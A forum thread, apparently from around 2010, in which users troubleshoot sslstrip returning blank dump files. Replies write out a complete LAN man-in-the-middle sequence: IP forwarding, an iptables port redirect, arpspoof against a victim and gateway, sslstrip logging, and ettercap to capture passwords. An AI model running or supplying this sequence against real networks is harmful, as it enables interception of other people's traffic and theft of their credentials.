Thread: Sslstrip's dump files are blank?

  1. #1
    Member Israel213's Avatar
    Join Date
    Apr 2008
    Posts
    65

    Default Sslstrip's dump files are blank?

    I've been trying to run sslstrip and have followed tutorials step-by-step and come back with the same results - Dump files that are blank. I've tried taking out the mitm steps too, to simplify the attack against my own machine and still have the same problem.

    This seems self-explanatory:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    cd /pentest/spoofing/sslstrip
    python sslstrip.py -w dumpfile
    I've run nmap to ensure that sslstrip was running on 10000:
    Code:
    10000/tcp open  snet-sensor-mgmt
    It even saves a dumpfile, but after logging in and out of sites I hit Ctrl+C to close sslstrip, open the dump file I saved with either cat or a text editor and there is absolutely nothing inside the file?

  2. #2
    Member dustyboner's Avatar
    Join Date
    Jan 2010
    Posts
    98

    Default Re: Sslstrip's dump files are blank?

    You forgot to start arpspoof.
    Should be something like:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    arpspoof -i wlan0 -t 192.168.0.100 192.168.0.1
    Code:
    sslstrip -w dumpfile
    Last edited by dustyboner; 07-07-2010 at 06:39 AM.

  3. #3
    Member Israel213's Avatar
    Join Date
    Apr 2008
    Posts
    65

    Default Re: Sslstrip's dump files are blank?

    I've tried that too and got the same results. As I stated, I was just trying to simplify the attack since it wasn't working and just sniff my own traffic. But I get blank dump files with arpspoof too.

  4. #4
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: Sslstrip's dump files are blank?

    Set up netcat listening on 10000 and see if you get traffic. I don't think you're actually sending anything to sslstrip.

    I personally haven't had a need to play with sslstrip yet. It seems strange to me that all the examples redirect port 80 traffic to 10000 since port 80 will generally be HTTP not HTTPS (like 99.9999999999% of the time). Which makes me think, to SSL no strip.
    Perhaps I'm simply missing a step or detail but that's my 2 cents, feel free to mock me....

    Edit: Shouldn't it be that you're listening for requests destined for 443 (not 80), sslstrip them and serve them back to the user via http on 10000?
    Last edited by thorin; 07-07-2010 at 05:08 PM.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  5. #5
    Member dustyboner's Avatar
    Join Date
    Jan 2010
    Posts
    98

    Default Re: Sslstrip's dump files are blank?

    I have no problems with sslstrip when it is set to port 80. I usually redirect to 8080 though. I also use ettercap to catch the passwords and such.

    example:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
    arpspoof -i wlan0 -t 192.168.0.64 192.168.0.1
    
    sslstrip -a -k -f -l 8080 -w stripped
    
    ettercap -T -q -i wlan0

  6. #6
    Member Israel213's Avatar
    Join Date
    Apr 2008
    Posts
    65

    Default Re: Sslstrip's dump files are blank?

    Hmmm... I just tried running with the commands DustyBoner gave and got some errors?
    Code:
    # python sslstrip.py -a -k -f -l 8080 -w stripped
    Traceback (most recent call last):
      File "sslstrip.py", line 254, in <module>
        main(sys.argv[1:])
      File "sslstrip.py", line 246, in main
        server = ThreadingHTTPServer(('', listenPort), StripProxy)
      File "/usr/lib/python2.5/SocketServer.py", line 330, in __init__
        self.server_bind()
      File "/usr/lib/python2.5/BaseHTTPServer.py", line 101, in server_bind
        SocketServer.TCPServer.server_bind(self)
      File "/usr/lib/python2.5/SocketServer.py", line 341, in server_bind
        self.socket.bind(self.server_address)
      File "<string>", line 1, in bind
    TypeError: an integer is required
    I seemed to narrow this down to the -l switch. I guess I never got this before because I was just using the default port. I don't have any broken packages. Know what this means?

  7. #7
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default Re: Sslstrip's dump files are blank?

    Quote Originally Posted by thorin View Post
    Set up netcat listening on 10000 and see if you get traffic. I don't think you're actually sending anything to sslstrip.

    I personally haven't had a need to play with sslstrip yet. It seems strange to me that all the examples redirect port 80 traffic to 10000 since port 80 will generally be HTTP not HTTPS (like 99.9999999999% of the time). Which makes me think, to SSL no strip.
    Perhaps I'm simply missing a step or detail but that's my 2 cents, feel free to mock me....

    Edit: Shouldn't it be that you're listening for requests destined for 443 (not 80), sslstrip them and serve them back to the user via http on 10000?


    Of course you are right Thorin, I think it just makes routing easier to send all traffic to 1 port and considering the majority of a victim's traffic would be http I guess sslstrip creators used 80 as to keep the session as fast as possible? Furthermore, perhaps sslstrip intercepts credentials over http as well.
    Last edited by killadaninja; 07-09-2010 at 06:55 AM.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.
